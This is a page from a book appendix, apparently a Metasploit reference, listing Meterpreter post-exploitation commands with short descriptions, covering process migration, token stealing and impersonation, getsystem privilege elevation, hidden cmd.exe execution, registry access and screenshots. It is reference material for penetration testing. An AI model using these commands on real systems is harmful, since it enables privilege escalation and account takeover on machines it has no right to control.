278
Appendix B
use priv
    Load the privilege extension for extended Meterpreter libraries.

ps
    Show all running processes and which accounts are associated with each process.

migrate PID
    Migrate to the specific process ID (PID is the target process ID gained from the ps command).

use incognito
    Load incognito functions. (Used for token stealing and impersonation on a target machine.)

list_tokens -u
    List available tokens on the target by user.

list_tokens -g
    List available tokens on the target by group.

impersonate_token DOMAIN_NAME\\USERNAME
    Impersonate a token available on the target.

steal_token PID
    Steal the tokens available for a given process and impersonate that token.

drop_token
    Stop impersonating the current token.

getsystem
    Attempt to elevate permissions to SYSTEM-level access through multiple attack vectors.

shell
    Drop into an interactive shell with all available tokens.

execute -f cmd.exe -i
    Execute cmd.exe and interact with it.

execute -f cmd.exe -i -t
    Execute cmd.exe with all available tokens.

execute -f cmd.exe -i -H -t
    Execute cmd.exe with all available tokens and make it a hidden process.

rev2self
    Revert back to the original user you used to compromise the target.

reg command
    Interact, create, delete, query, set, and much more in the target's registry.

setdesktop number
    Switch to a different screen based on who is logged in.

screenshot
    Take a screenshot of the target's screen.